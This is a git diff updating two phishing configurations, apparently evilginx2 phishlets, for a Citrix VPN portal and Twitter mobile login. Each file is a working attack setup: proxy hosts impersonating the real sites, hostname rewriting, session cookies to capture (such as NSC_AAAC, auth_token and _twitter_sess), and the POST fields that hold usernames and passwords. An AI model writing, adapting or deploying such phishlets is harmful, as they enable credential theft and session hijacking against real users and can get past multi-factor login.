diff --git a/phishlets/citrix.yaml b/phishlets/citrix.yaml
index b61069256..362466ca7 100644
--- a/phishlets/citrix.yaml
+++ b/phishlets/citrix.yaml
@@ -1,18 +1,21 @@
 name: 'Citrix Portal'
 author: '@424f424f'
-min_ver: '2.1.0'
+min_ver: '2.2.0'
 proxy_hosts:
   - {phish_sub: 'subdomainhere', orig_sub: 'subdomainhere', domain: 'domainhere', session: true, is_landing: true}
 sub_filters:
-  - {hostname: 'domainhere', sub: 'subdomainhere', domain: 'domainhere', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
+  - {triggers_on: 'domainhere', orig_sub: 'subdomainhere', domain: 'domainhere', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
 auth_tokens:
   - domain: 'domainhere'
     keys: ['ASP.NET_SessionId','CsrfToken','NSC_AAAC','NSC_DLGE','pwcount']
-user_regex:
-  key: 'login'
-  re: '(.*)'
-pass_regex:
-  key: 'passwd'
-  re: '(.*)'
+credentials:
+  username:
+    key: 'login'
+    search: '(.*)'
+    type: 'post'
+  password:
+    key: 'passwd'
+    search: '(.*)'
+    type: 'post'
 landing_path:
   - '/vpn/index.html'
diff --git a/phishlets/twitter-mobile.yaml b/phishlets/twitter-mobile.yaml
index a5c735cb8..e7e16b31a 100644
--- a/phishlets/twitter-mobile.yaml
+++ b/phishlets/twitter-mobile.yaml
@@ -1,22 +1,24 @@
-name: 'twitter-mobile'
 author: '@white_fi'
-min_ver: '2.0.0'
+min_ver: '2.2.0'
 proxy_hosts:
   - {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true}
   - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false}
   - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false}
 sub_filters:
-  - {hostname: 'mobile.twitter.com', sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
-  - {hostname: 'abs.twimg.com', sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
-  - {hostname: 'api.twitter.com', sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
+  - {triggers_on: 'mobile.twitter.com', orig_sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
+  - {triggers_on: 'abs.twimg.com', orig_sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
+  - {triggers_on: 'api.twitter.com', orig_sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
 auth_tokens:
   - domain: 'twitter.com'
     keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token']
-user_regex:
-  key: 'session[username_or_email]'
-  re: '(.*)'
-pass_regex:
-  key: 'session[password]'
-  re: '(.*)'
+credentials:
+  username:
+    key: 'session\[username_or_email\]'
+    search: '(.*)'
+    type: 'post'
+  password:
+    key: 'session\[password\]'
+    search: '(.*)'
+    type: 'post'
 landing_path:
   - '/login'